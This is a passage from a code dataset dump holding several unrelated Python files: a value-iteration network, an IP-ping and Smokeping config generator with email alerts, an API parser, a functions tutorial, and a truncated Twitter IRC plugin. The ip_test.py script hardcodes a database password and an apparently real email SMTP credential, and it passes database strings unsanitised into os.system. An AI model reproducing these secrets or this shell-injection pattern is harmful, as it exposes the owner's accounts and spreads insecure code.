torch.nn.parameter import Parameter\nimport numpy as np\nnp.random.seed(0)\n\n\nclass VIN(nn.Module):\n def __init__(self, args):\n super(VIN, self).__init__()\n self.args = args\n self.ly_hidden = nn.Conv2d(in_channels=args.num_input, out_channels=args.num_hidden,\n kernel_size=(3, 3), stride=1, padding=1, bias=True)\n self.ly_reward = nn.Conv2d(in_channels=args.num_hidden, out_channels=1,\n kernel_size=(3, 3), stride=1, padding=1, bias=False)\n self.ly_q_value = nn.Conv2d(in_channels=1, out_channels=args.num_qlayer,\n kernel_size=(3, 3), stride=1, padding=1, bias=False)\n self.fc = nn.Linear(in_features=args.num_qlayer,\n out_features=8, bias=False)\n self.weight_v_value = Parameter(torch.zeros(\n args.num_qlayer, 1, 3, 3), requires_grad=True)\n self.sm = nn.Softmax(dim=1)\n\n # params\n self.reward_image = None\n self.v_value_image = None\n\n def eval_q_value(self, r, v):\n return F.conv2d(\n input=torch.cat([r, v], 1),\n weight=torch.cat(\n [self.ly_q_value.weight, self.weight_v_value], 1),\n stride=1, padding=1)\n\n def forward(self, input_view, state_x, state_y, num_vi, visualize=False):\n # intermediate output\n hidden = self.ly_hidden(input_view)\n\n # get reward\n reward = self.ly_reward(hidden)\n\n # get initial q value from reward\n q_value = self.ly_q_value(reward)\n\n # get v value\n v_value, _ = torch.max(q_value, dim=1, keepdim=True)\n\n if visualize is True:\n self.reward_image = reward.data.cpu().numpy().reshape(\n self.args.dom_size, self.args.dom_size)\n self.v_value_image = v_value.data.cpu().numpy().reshape(\n 1, self.args.dom_size, self.args.dom_size)\n\n # Update q and v values\n for i in range(num_vi - 1):\n q_value = self.eval_q_value(reward, v_value)\n v_value, _ = torch.max(q_value, dim=1, keepdim=True)\n if visualize is True:\n self.v_value_image = np.append(self.v_value_image, v_value.data.cpu(\n ).numpy().reshape(1, self.args.dom_size, self.args.dom_size), axis=0)\n\n q_value = self.eval_q_value(reward, v_value)\n\n batch_size, l_q, _, _ = q_value.size()\n\n qvalue_state_xy = q_value[torch.arange(batch_size), :, state_x.long(),\n state_y.long()].view(batch_size, l_q)\n\n # transform qvalue corresponding to current state into actions\n logits = self.fc(qvalue_state_xy)\n\n return logits, self.sm(logits)\n","sub_path":"src/model/vin.py","file_name":"vin.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"300006380","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n# github: https://github.com/houm01\n\n\nimport os\nimport smtplib\nimport datetime\nimport psycopg2\nfrom pypinyin import lazy_pinyin\nfrom email.utils import formataddr\nfrom email.mime.text import MIMEText\n\n# 定义一个邮件的列表\nmail_down_ip_body = []\n\n\n# 操作IP数据库,测试不通的设置为 is down\ndef ping_ip():\n # 用 os.system ping 太慢了,可以优化一下,使用 python 封装 icmp,并使用多线程\n conn = psycopg2.connect(dbname=\"houm01db\", user=\"postgres\", password=\"packet123\", host=\"10.20.99.105\", port=\"5432\")\n cursor = conn.cursor()\n\n # 操作前备份一下table,防止自己网络有问题,将所有ip都设为down状态了\n # cursor.execute(\"select china_edu from ip_test;\")\n # ip_list_edu = cursor.fetchall()\n # for i in ip_list_edu:\n # response = os.system('ping -c 8 ' + i[0])\n # if response == 0:\n # print(i[0], 'is up')\n # else:\n # print(i[0], 'is down')\n # cursor.execute(\"update ip_test set china_edu = 'is down' where china_edu = (%s) and china_edu != 'is down';\", (i[0],))\n # cursor.execute(\"select state, city from ip_test where china_edu = (%s);\",\n # (i[0],))\n # china_edu_down_name = cursor.fetchall()\n # for z in china_edu_down_name:\n # mail_down_ip_body.append(('教育网', z[0].rstrip() + z[1].rstrip(), i[0].rstrip()))\n\n # 为节省时间,这里就不合并到一起了\n cursor.execute(\"select china_unicom from ip_test;\")\n ip_list_unicom = cursor.fetchall()\n for i in ip_list_unicom:\n response = os.system('ping -c 8 ' + i[0])\n if response == 0:\n print(i[0], 'is up')\n else:\n print(i[0], 'is down')\n cursor.execute(\"select state, city from ip_test where china_unicom = (%s) and china_unicom != 'is down';\",\n (i[0],))\n china_unicom_down_name = cursor.fetchall()\n for z in china_unicom_down_name:\n mail_down_ip_body.append(('联通', z[0].rstrip() + z[1].rstrip(), i[0].rstrip()))\n cursor.execute(\"update ip_test set china_unicom = 'is down' where china_unicom = (%s);\",\n (i[0],))\n\n cursor.execute(\"select china_mobile from ip_test;\")\n ip_list_mobile = cursor.fetchall()\n for i in ip_list_mobile:\n response = os.system('ping -c 8 ' + i[0])\n if response == 0:\n print(i[0], 'is up')\n else:\n print(i[0], 'is down')\n cursor.execute(\"select state, city from ip_test where china_mobile = (%s) and china_mobile != 'is down';\",\n (i[0],))\n china_mobile_down_name = cursor.fetchall()\n for z in china_mobile_down_name:\n mail_down_ip_body.append(('移动', z[0].rstrip() + z[1].rstrip(), i[0].rstrip()))\n cursor.execute(\"update ip_test set china_mobile = 'is down' where china_mobile = (%s);\",\n (i[0],))\n\n cursor.execute(\"select china_telecom from ip_test;\")\n ip_list_telecom = cursor.fetchall()\n for i in ip_list_telecom:\n response = os.system('ping -c 8 ' + i[0])\n if response == 0:\n print(i[0], 'is up')\n else:\n print(i[0], 'is down')\n cursor.execute(\"select state, city from ip_test where china_telecom = (%s) and china_telecom != 'is down';\",\n (i[0],))\n china_telecom_down_name = cursor.fetchall()\n for z in china_telecom_down_name:\n mail_down_ip_body.append(('电信', z[0].rstrip() + z[1].rstrip(), i[0].rstrip()))\n cursor.execute(\"update ip_test set china_telecom = 'is down' where china_telecom = (%s);\",\n (i[0],))\n\n cursor.execute(\"select ip from ip_test_international;\")\n ip_list_int = cursor.fetchall()\n for i in ip_list_int:\n response = os.system('ping -c 8 ' + i[0])\n if response == 0:\n print(i[0], 'is up')\n else:\n print(i[0], 'is down')\n cursor.execute(\"select name from ip_test_international where ip = (%s) and ip != 'is down';\",\n (i[0],))\n ip_int_down_name = cursor.fetchall()\n try:\n mail_down_ip_body.append((ip_int_down_name[0][0], i[0]))\n except IndexError:\n pass\n cursor.execute(\"update ip_test_international set ip = 'is down' where ip = (%s);\",\n (i[0],))\n\n conn.commit()\n cursor.close()\n conn.close()\n\n\n# 从数据库拿到国内和国际的IP测试数据\ndef get_data():\n conn = psycopg2.connect(dbname=\"houm01db\", user=\"postgres\", password=\"packet123\", host=\"10.20.99.105\", port=\"5432\")\n cursor = conn.cursor()\n cursor.execute(\"select state, city, china_telecom, china_unicom, china_mobile, china_edu from ip_test;\")\n ip_test = cursor.fetchall()\n cursor.execute(\"select name, name_en, ip from ip_test_international;\")\n ip_test_int = cursor.fetchall()\n cursor.close()\n conn.close()\n return ip_test, ip_test_int\n\n\ndef output_config():\n china_telcom = []\n china_unicom = []\n china_mobile = []\n int_ip = []\n for i in get_data()[0]:\n if 'is down' != (i[2].rstrip()):\n china_telcom.append(('+++ dianxin-' + ''.join(x[0] for x in lazy_pinyin(i[0].rstrip().rstrip('市'))) + '-' + str(i[2]).replace('.', ''), 'menu = ' + i[0].rstrip().rstrip('市') + i[1].rstrip().rstrip('市') + '电信', 'title = ' + ''.join(lazy_pinyin(i[0].rstrip().rstrip('市'))) + '-' + ''.join(lazy_pinyin(i[1].rstrip().rstrip('市'))) + '-' + i[2].rstrip(), 'host = ' + i[2].rstrip()))\n\n for i in get_data()[0]:\n # print(i[3].rstrip())\n if 'is down' != (i[3].rstrip()):\n china_unicom.append(('+++ liantong-' + ''.join(x[0] for x in lazy_pinyin(i[0].rstrip().rstrip('市'))) + '-' + str(i[3]).replace('.', ''), 'menu = ' + i[0].rstrip().rstrip('市') + i[1].rstrip().rstrip('市') + '联通', 'title = ' + ''.join(lazy_pinyin(i[0].rstrip().rstrip('市'))) + '-' + ''.join(lazy_pinyin(i[1].rstrip().rstrip('市'))) + '-' + i[3].rstrip(), 'host = ' + i[3].rstrip()))\n\n for i in get_data()[0]:\n if 'is down' != (i[4].rstrip()):\n china_mobile.append(('+++ yidong-' + ''.join(x[0] for x in lazy_pinyin(i[0].rstrip().rstrip('市'))) + '-' + str(i[4]).replace('.', ''), 'menu = ' + i[0].rstrip().rstrip('市') + i[1].rstrip().rstrip('市') + '移动', 'title = ' + ''.join(lazy_pinyin(i[0].rstrip().rstrip('市'))) + '-' + ''.join(lazy_pinyin(i[1].rstrip().rstrip('市'))) + '-' + i[4].rstrip(), 'host = ' + i[4].rstrip()))\n\n for i in get_data()[1]:\n if 'is down' != (i[2]):\n int_ip.append(('++ ' + ''.join(i[1]), 'menu = ' + i[0], 'title = ' + i[1] + '-' + i[2], 'host = ' + i[2]))\n\n return china_telcom, china_unicom, china_mobile, int_ip\n\n\n# 将之前所有获取的信息整理成smokeping所需的\"Targets\"配置文件\n# 这里变量设置的比较乱\ndef finally_target():\n with open('ip_target.txt', 'r+') as f:\n content = f.read()\n f.seek(0, 0)\n with open('begin_text', 'r') as file:\n f.write(file.read() + '\\n' + content)\n print(f.read())\n with open('ip_target.txt', 'a') as f:\n with open('end_text', 'r') as file:\n f.write(file.read())\n\n with open('ip_target.txt', 'r+') as f:\n aa = f.read()\n pos = aa.find('+++ liantong')\n cc = aa[:pos] + \"\"\"\n++ liantong #联通\nmenu = 联通网络监控 \ntitle = China Unicom \n#host = /Other/liantong/liantong-bj /Other/liantong/liantong-sh /Other/liantong/liantong-gz \n \"\"\" + '\\n' + aa[pos:]\n\n dd = cc.find('+++ yidong')\n ee = cc[:dd] + \"\"\"\n++ yidong #移动\nmenu = 移动网络监控 \ntitle = China mobile\n\"\"\" + '\\n' + cc[dd:]\n\n ff = ee.find('++ Tokyo-Japan')\n gg = ee[:ff] + \"\"\"\n+ Internet\nmenu = 国际线路\ntitle = 国际线路\n \"\"\" + '\\n' + ee[ff:]\n\n with open('Targets', 'w') as finally_txt:\n finally_txt.write(gg)\n\n\ndef mail():\n my_sender = 'houm01@foxmail.com'\n my_user = 'houm01@foxmail.com'\n my_pass = 'vcqvmwgmwgzlbajb'\n\n with open('text.txt', 'w') as f:\n for i in mail_down_ip_body:\n f.write(str(i).replace('(', '').replace(')', '').replace('\\'', '').replace(',', ' -- ') + '\\n')\n\n with open('text.txt', 'r') as f:\n mail_txt_str = f.read()\n\n if len(mail_txt_str) != 0:\n mail_text = '''{} 检测到新增 down ip 如下\\n\\n{}\\n已生成Targets文件,请管理员判断是否处理'''.format(datetime.datetime.now().strftime('%Y-%m-%d %H:%M'), mail_txt_str)\n scan_state = '有新增的down ip,请关注'\n else:\n mail_text = '''{} 经过检测,没有发现有新增down的IP\\n\n {}\n '''.format(datetime.datetime.now().strftime('%Y-%m-%d %H:%M'), mail_txt_str)\n scan_state = '无新增down ip'\n\n ret = True\n try:\n msg = MIMEText(mail_text, 'plain', 'utf-8')\n msg['From'] = formataddr([\"Smokeping 测试\", my_sender]) # 括号里的对应发件人邮箱昵称、发件人邮箱账号\n msg['To'] = formataddr([\"Service\", my_user]) # 括号里的对应收件人邮箱昵称、收件人邮箱账号\n msg['Subject'] = \"Smokeping ��试结果报告 - {} - {}\".format(datetime.datetime.now().strftime('%Y-%m-%d %H:%M'), scan_state) # 邮件的主题,也可以说是标题\n\n server = smtplib.SMTP_SSL(\"smtp.qq.com\", 465) # 发件人邮箱中的SMTP服务器,端口是25\n server.login(my_sender, my_pass) # 括号中对应的是发件人邮箱账号、邮箱密码\n server.sendmail(my_sender, [my_user, ], msg.as_string()) # 括号中对应的是发件人邮箱账号、收件人邮箱账号、发送邮件\n server.quit() # 关闭连接\n except Exception: # 如果 try 中的语句没有执行,则会执行下面的 ret=False\n ret = False\n if ret:\n print(\"邮件发送成功\")\n else:\n print(\"邮件发送失败\")\n\n\nif __name__ == '__main__':\n ping_ip()\n with open('ip_target.txt', 'w') as f:\n for i in output_config():\n for y in i:\n for z in y:\n f.write(z + '\\n')\n finally_target()\n\n mail()\n\n\n\n","sub_path":"python_project/ip_test/ip_test.py","file_name":"ip_test.py","file_ext":"py","file_size_in_byte":10434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"186030262","text":"from dynaconf import settings\nfrom typing import Dict, Union\nfrom datetime import datetime\nimport argparse\n\nfrom api_parser.common.json_parser import HbSmpTable, StlSmpTable\nfrom api_parser.common.db_interaction import write_to_db\nfrom api_parser.common.logger import get_logger\nfrom api_parser.common.api_amr import AmrApiRequester\n\nlogger = get_logger(__name__)\n\n\ndef main():\n # interconects with api\n args: argparse.Namespace = parse_args()\n amr_api = AmrApiRequester()\n amr_api.auth(settings['auth_url'],\n user=settings['api_user'],\n password=settings['api_password'])\n data: list = amr_api.get_data(settings['data_url'],\n args.strt_time, args.end_time,\n args.card_status)\n\n # create tables objects\n hb_smp_table = HbSmpTable(data)\n stl_smp_table = StlSmpTable(data)\n\n # Write to DB\n db_settings: Dict[str, Union[str, int]]\n db_settings = {\n 'host': settings['host'], 'port': settings['port'],\n 'database': settings['database'],\n 'user': settings['user'],\n 'password': settings['password'],\n }\n write_hb_smp_table: str = write_to_db(hb_smp_table.as_list(),\n table_name=settings['hb_smp_table'],\n **db_settings)\n\n write_stl_smp_table: str = write_to_db(stl_smp_table.as_list(),\n table_name=settings['stl_smp_table'],\n **db_settings)\n\n\nclass argparse_logger(argparse.ArgumentParser):\n def error(self, message):\n '''\n add logging to argparse\n '''\n logger.error(f'Initial error ocurred : {message}')\n super().error(message)\n\n\ndef parse_args(*args, **kwargs) -> argparse.Namespace:\n '''\n Implement comand line arg parser\n '''\n parser = argparse_logger(description='Parses api for a certain range of time and writes the result in database',\n prog=settings['name'])\n parser.add_argument('-v', '--version', action='version', version=settings['version'])\n parser.add_argument('-s', '--strt_time', type=datetime.fromisoformat,\n help='sampling start time in iso format', required=True, metavar='')\n parser.add_argument('-e', '--end_time', type=datetime.fromisoformat,\n help='sampling end time in iso format', required=True, metavar='')\n parser.add_argument('-c', '--card_status', default='0', choices=['0', '1', '2'], required=False, metavar='',\n help='''\n filtering by ID_CALL_RESULT_STATUS field.\n Choices: 0 - all cards 1 - draft, 2 - filled card.\n Default 0.\n ''')\n return parser.parse_args(*args, **kwargs)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"api_parser/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"319192987","text":"# Programming with Mosh\n# https://www.youtube.com/watch?v=f79MRyMsjrQ\nimport math\n\nprint(\"# Functions\")\n\n# Functions and parameters\n# Perform a task and return None / value\n\n\ndef greet(first_name, last_name=\"the Great\"):\n print(\"Hello World\")\n print(\"Welcome\", first_name)\n return f\"Hi {first_name} {last_name}\"\n\n\nmessage = greet(\"Jess\")\nprint(message)\n# file = open(\"jess.txt\", \"w\")\n# file.write(message)\n\n\ndef increment(number, by=1):\n return number + by\n\n\n# keyword argument\nprint(\"Increment: \", increment(2, by=1))\n\n\ndef multiply(*numbers): # arguments - tuples\n product = 1\n for number in numbers:\n print(number)\n # assignment operator\n product *= number\n return product\n\n\n# Collections of arguments\n# list notation [1,2,3,4]\n# tuples (1,2,3,4)\nprint(\"Multiply: Args: \", multiply(1, 2, 3))\n\n\ndef save_user(**user): # keyword arguments - dictionary\n print(\"Dictionary Name: \", user[\"name\"])\n\n\n# Dictionary Object\nsave_user(id=1, name=\"Jess\", age=35)\n\n# Scope\n# Avoid modify Global variable\ngreeting = \"Hello\"\n\n\ndef hello(name):\n global greet\n greet = f\"Hi {name}\"\n\n\n# Scope\nprint(greet)\nhello(\"Jess\")\nprint(greet)\n\n\n# F5 Run Debug\n# Shift F5 Debug to stop\n# F10 Line by line Execute\n# F11 Step in to a Function\n# Shift F11 Stip out into a Function\n# F9 Set Breakpoin\n\nprint(\"Start\")\nprint(\"Multiply: \", multiply(1, 2, 3))\n\n# VSCode Tricks\n# Alt Arrow to move code up and down\n# Shift Alt Arrow to duplicate\n# Comment Ctrl + /\n\n\nprint(\"Exercise\")\n\n\ndef fizz_buzz(input):\n if(input % 3 == 0 and input % 5 == 0):\n return \"FizzBuzz\"\n if(input % 3 == 0):\n return \"Fizz\"\n if(input % 5 == 0):\n return \"Buzz\"\n return input\n\n\nprint(fizz_buzz(15))\n","sub_path":"pythonMosh/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"313940004","text":"###\n# Copyright (c) 2014, spline\n# Copyright (c) 2020, oddluck \n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions, and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions, and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the author of this software nor the name of\n# contributors to this software may be used to endorse or promote products\n# derived from this software without specific prior written consent.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n###\n\n# my libs\nimport json\nimport requests\nfrom requests_oauthlib import OAuth1\nimport os\n\n# libraries for time_created_at\nimport time\nfrom datetime import datetime\n\n# for unescape\nimport re\nimport html.entities\n\n# supybot libs\nimport supybot.utils as utils\nfrom supybot.commands import *\nimport supybot.plugins as plugins\nimport supybot.ircutils as ircutils\nimport supybot.callbacks as callbacks\nimport supybot.conf as conf\nimport supybot.world as world\nimport supybot.log as log\n\n\nclass OAuthApi:\n \"\"\"OAuth class to work with Twitter v1.1 API.\"\"\"\n\n def __init__(self, consumer_key, consumer_secret, token, token_secret):\n self.auth = OAuth1(consumer_key, consumer_secret, token, token_secret)\n\n def ApiCall(self, call, parameters={}):\n \"\"\"Calls the twitter API with 'call' and returns the twitter object (JSON).\"\"\"\n extra_params = {}\n if parameters:\n extra_params.update(parameters)\n try:\n r = requests.get(\n \"https://api.twitter.com/1.1/\" + call + \".json\",\n params=extra_params,\n auth=self.auth,\n timeout=10,\n )\n r.raise_for_status()\n except (\n requests.exceptions.RequestException,\n requests.exceptions.HTTPError,\n ) as e:\n log.info(\n \"Tweety: error connecting to Twitter API (Retrying...): {0}\".format(e)\n )\n try:\n r = requests.get(\n \"https://api.twitter.com/1.1/\" + call + \".json\",\n params=extra_params,\n auth=self.auth,\n timeout=10,\n )\n r.raise_for_status()\n except (\n requests.exceptions.RequestException,\n requests.exceptions.HTTPError,\n ) as e:\n log.info(\n \"Tweety: error connecting to Twitter API on retry: {0}\".format(e)\n )\n else:\n return r.content\n else:\n return r.content\n\n\nclass Tweety(callbacks.Plugin):\n \"\"\"Public Twitter class for working with the API.\"\"\"\n\n threaded = True\n\n def __init__(self, irc):\n self.__parent = super(Tweety, self)\n self.__parent.__init__(irc)\n self.twitterApi = False\n if not self.twitterApi:\n self._checkAuthorization()\n self.data_file = conf.supybot.directories.data.dirize(\"tweety.json\")\n if os.path.exists(self.data_file):\n with open(self.data_file) as f:\n self.since_id = json.load(f)\n else:\n log.debug(\"Tweety: Creating new since_id DB\")\n self.since_id = {}\n world.flushers.append(self._flush_db)\n\n def _flush_db(self):\n with open(self.data_file, \"w\") as f:\n json.dump(self.since_id, f)\n\n def die(self):\n world.flushers.remove(self._flush_db)\n self._flush_db()\n super().die()\n\n def _shortenUrl(self, url):\n \"\"\"Shortens a long URL into a short one.\"\"\"\n try:\n data = requests.get(\n \"http://tinyurl.com/api-create.php?url={0}\".format(url), timeout=5\n )\n except (\n requests.exceptions.RequestException,\n requests.exceptions.HTTPError,\n ) as e:\n log.error(\"Tweety: ERROR retrieving tiny url: {0}\".format(e))\n return\n else:\n return data.content.decode()\n\n def _checkAuthorization(self):\n \"\"\" Check if we have our keys and can auth.\"\"\"\n if not self.twitterApi: # if not set, try and auth.\n failTest = False # first check that we have all 4 keys.\n for checkKey in (\n \"consumerKey\",\n \"consumerSecret\",\n \"accessKey\",\n \"accessSecret\",\n ):\n try: # try to see if each key is set.\n testKey = self.registryValue(checkKey)\n except: # a key is not set, break and error.\n log.error(\n \"Tweety: ERROR checking keys. We're missing the config value \"\n \"for: {0}. Please set this and try again.\".format(checkKey)\n )\n failTest = True\n break\n # if any missing, throw an error and keep twitterApi=False\n if failTest:\n log.error(\n \"Tweety: ERROR getting keys. You must set all 4 keys in config \"\n \"variables and reload plugin.\"\n )\n return False\n # We have all 4 keys. Check validity by calling verify_credentials in the API.\n self.log.info(\"Got all 4 keys. Now trying to auth up with Twitter.\")\n twitterApi = OAuthApi(\n self.registryValue(\"consumerKey\"),\n self.registryValue(\"consumerSecret\"),\n self.registryValue(\"accessKey\"),\n self.registryValue(\"accessSecret\"),\n )\n data = twitterApi.ApiCall(\"account/verify_credentials\")\n # check the response. if we can load json, it means we're authenticated.\n try: # if we pass, response is validated. set self.twitterApi w/object.\n json.loads(data)\n self.log.info(\n \"I have successfully authorized and logged in to Twitter using \"\n \"your credentials.\"\n )\n self.twitterApi = OAuthApi(\n self.registryValue(\"consumerKey\"),\n self.registryValue(\"consumerSecret\"),\n self.registryValue(\"accessKey\"),\n self.registryValue(\"accessSecret\"),\n )\n except: # response failed. Return what we got back.\n log.error(\"Tweety: ERROR. I could not log in using your credentials.\")\n return False\n else: # if we're already validated, pass.\n pass\n\n ########################\n # COLOR AND FORMATTING #\n ########################\n\n def _red(self, string):\n \"\"\"Returns a red string.\"\"\"\n return ircutils.mircColor(string, \"red\")\n\n def _blue(self, string):\n \"\"\"Returns a blue string.\"\"\"\n return ircutils.mircColor(string, \"blue\")\n\n def _bold(self, string):\n \"\"\"Returns a bold string.\"\"\"\n return ircutils.bold(string)\n\n def _ul(self, string):\n \"\"\"Returns an underline string.\"\"\"\n return ircutils.underline(string)\n\n def _bu(self, string):\n \"\"\"Returns a bold/underline string.\"\"\"\n return ircutils.bold(ircutils.underline(string))\n\n ######################\n # INTERNAL FUNCTIONS #\n ######################\n\n def _unescape(self, text):\n \"\"\"Created by Fredrik Lundh (http://effbot.org/zone/re-sub.htm#unescape-html)\"\"\"\n # quick dump \\n and \\r, usually coming from bots that autopost html.\n text = text.replace(\"\\n\", \" \").replace(\"\\r\", \" \")\n # now the actual unescape.\n def fixup(m):\n text = m.group(0)\n if text[:2] == \"&#\":\n # character reference\n try:\n if text[:3] == \"&#x\":\n return chr(int(text[3:-1], 16))\n else:\n return chr(int(text[2:-1]))\n except (ValueError, OverflowError):\n pass\n else:\n # named entity\n try:\n text = chr(html.entities.name2codepoint[text[1:-1]])\n except KeyError:\n pass\n return text # leave as is\n\n return re.sub(r\"&#?\\w+;\", fixup, text)\n\n def _time_created_at(self, s):\n \"\"\"\n Return relative time delta between now and s (dt string).\n \"\"\"\n try: # timeline's created_at Tue May 08 10:58:49 +0000 2012\n ddate = time.strptime(s, \"%a %b %d %H:%M:%S +0000 %Y\")[:-2]\n except ValueError:\n try: # search's created_at Thu, 06 Oct 2011 19:41:12 +0000\n ddate = time.strptime(s, \"%a, %d %b %Y %H:%M:%S +0000\")[:-2]\n except ValueError:\n return s\n # do the math\n d = datetime.utcnow() - datetime(*ddate, tzinfo=None)\n # now parse and return.\n if d.days:\n rel_time = \"{:1d}d ago\".format(abs(d.days))\n elif d.seconds > 3600:\n rel_time = \"{:.1f}h ago\".format(round((abs(d.seconds) / 3600), 1))\n elif 60 <= d.seconds < 3600:\n rel_time = \"{:.1f}m ago\".format(round((abs(d.seconds) / 60), 1))\n else:\n rel_time = \"%ss ago\" % (abs(d.seconds))\n return rel_time\n\n def _outputTweet(\n self, irc, msg, nick, name, verified, text, time, tweetid, retweetid\n ):\n \"\"\"\n Constructs string to output for Tweet. Used for tsearch and twitter.\n \"\"\"\n url = url2 = None\n # build output string.\n if self.registryValue(\"outputColorTweets\", msg.args[0]):\n ret = \"@{0}\".format(self._ul(self._blue(nick)))\n else: # bold otherwise.\n ret = \"@{0}\".format(self._bu(nick))\n if verified:\n string = self._bold(ircutils.mircColor(\"✓\", \"white\", \"blue\"))\n ret += \"{}\".format(string)\n # show real name in tweet output?\n if not self.registryValue(\"hideRealName\", msg.args[0]):\n ret += \" ({0})\".format(name)\n # short url the link to the tweet?\n if self.registryValue(\"addShortUrl\", msg.args[0]):\n url = self._shortenUrl(\n \"https://twitter.com/{0}/status/{1}\".format(nick, tweetid)\n )\n if url:\n text += \" {0}\".format(url)\n if retweetid and retweetid != tweetid:\n url2 = self._shortenUrl(\n \"https://twitter.com/{0}/status/{1}\".format(nick, retweetid)\n )\n if url2:\n text += \" {0}\".format(url2)\n # add in the end with the text + tape.\n if self.registryValue(\"colorTweetURLs\", msg.args[0]): # color urls.\n text = re.sub(\n r\"(http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F]\"\n r\"[0-9a-fA-F]))+)\",\n self._red(r\"\\1\"),\n text,\n )\n ret += \": {0} ({1})\".format(text, self._bold(time))\n else: # only bold time. no text color.\n ret += \": {0} ({1})\".format(text, self._bold(time))\n # now return.\n return ret\n\n def _woeid_lookup(self, lookup):\n \"\"\"\n Use Yahoo's API to look-up a WOEID.\n \"\"\"\n data = self.twitterApi.ApiCall(\"trends/available\")\n if not data:\n log.error(\"Tweety: ERROR retrieving data from Trends API\")\n return\n try:\n data = json.loads(data)\n except:\n data = None\n log.error(\"Tweety: ERROR retrieving data from Trends API\")\n if not data:\n log.info(\"Tweety: No location results for {0}\".format(lookup))\n return\n return next(\n (item[\"woeid\"] for item in data if lookup.lower() in item[\"name\"].lower()),\n None,\n )\n\n ####################\n # PUBLIC FUNCTIONS #\n ####################\n\n def woeidlookup(self, irc, msg, args, lookup):\n \"\"\"\n Search Yahoo's WOEID DB for a location. Useful for the trends variable.\n Ex: London or Boston\n \"\"\"\n woeid = self._woeid_lookup(lookup)\n if woeid:\n irc.reply(\"WOEID: {0} for '{1}'\".format(self._bold(woeid), lookup))\n else:\n irc.reply(\n \"ERROR: Something broke trying to find a WOEID for '{0}'\".format(lookup)\n )\n\n woeidlookup = wrap(woeidlookup, [\"text\"])\n\n def ratelimits(self, irc, msg, args):\n \"\"\"\n Display current rate limits for your twitter API account.\n \"\"\"\n # before we do anything, make sure we have a twitterApi object.\n if not self.twitterApi:\n irc.reply(\n \"ERROR: Twitter is not authorized. Please check logs before running \"\n \"this command.\"\n )\n return\n # make API call.\n data = self.twitterApi.ApiCall(\n \"application/rate_limit_status\",\n parameters={\"resources\": \"trends,search,statuses,users\"},\n )\n try:\n data = json.loads(data)\n except:\n irc.reply(\"ERROR: Failed to lookup ratelimit data: {0}\".format(data))\n return\n # parse data;\n data = data.get(\"resources\")\n if not data: # simple check if we have part of the json dict.\n irc.reply(\n \"ERROR: Failed to fetch application rate limit status. Something could \"\n \"be wrong with Twitter.\"\n )\n log.error(\"Tweety: ERROR fetching rate limit data: {0}\".format(data))\n return\n # dict of resources and how to parse. key=name, values are for the json dict.\n resources = {\n \"trends\": [\"trends\", \"/trends/place\"],\n \"tsearch\": [\"search\", \"/search/tweets\"],\n \"twitter --id\": [\"statuses\", \"/statuses/show/:id\"],\n \"twitter --info\": [\"users\", \"/users/show/:id\"],\n \"twitter timeline\": [\"statuses\", \"/statuses/user_timeline\"],\n }\n # now iterate through dict above.\n for resource in resources:\n rdict = resources[resource] # get value.\n endpoint = data.get(rdict[0]).get(rdict[1]) # value[0], value[1]\n minutes = \"%sm%ss\" % divmod(\n int(endpoint[\"reset\"]) - int(time.time()), 60\n ) # math.\n output = \"Reset in: {0} Remaining: {1}\".format(\n minutes, endpoint[\"remaining\"]\n )\n irc.reply(\"{0} :: {1}\".format(self._bold(resource), output))\n\n ratelimits = wrap(ratelimits)\n\n def trends(self, irc, msg, args, getopts, optwoeid):\n \"\"\"[--exclude] [location]\n Returns the top Twitter trends for a specific location. Use optional argument\n location for trends. Defaults to worldwide and can be set via config variable.\n Use --exclude to not include #hashtags in trends data.\n Ex: Boston or --exclude London\n \"\"\"\n # enforce +voice or above to use command?\n if self.registryValue(\"requireVoiceOrAbove\", msg.args[0]): # should we check?\n if ircutils.isChannel(msg.args[0]): # are we in a channel?\n if not irc.state.channels[msg.args[0]].isVoicePlus(\n msg.nick\n ): # are they + or @?\n irc.error(\n \"ERROR: You have to be at least voiced to use the trends \"\n \"command in {0}.\".format(msg.args[0])\n )\n return\n # before we do anything, make sure we have a twitterApi object.\n if not self.twitterApi:\n irc.reply(\n \"ERROR: Twitter is not authorized. Please check logs before running \"\n \"this command.\"\n )\n return\n # default arguments.\n args = {\n \"id\": self.registryValue(\"woeid\", msg.args[0]),\n \"exclude\": self.registryValue(\"hideHashtagsTrends\", msg.args[0]),\n }\n # handle input.\n if getopts:\n for (key, value) in getopts:\n if key == \"exclude\": # remove 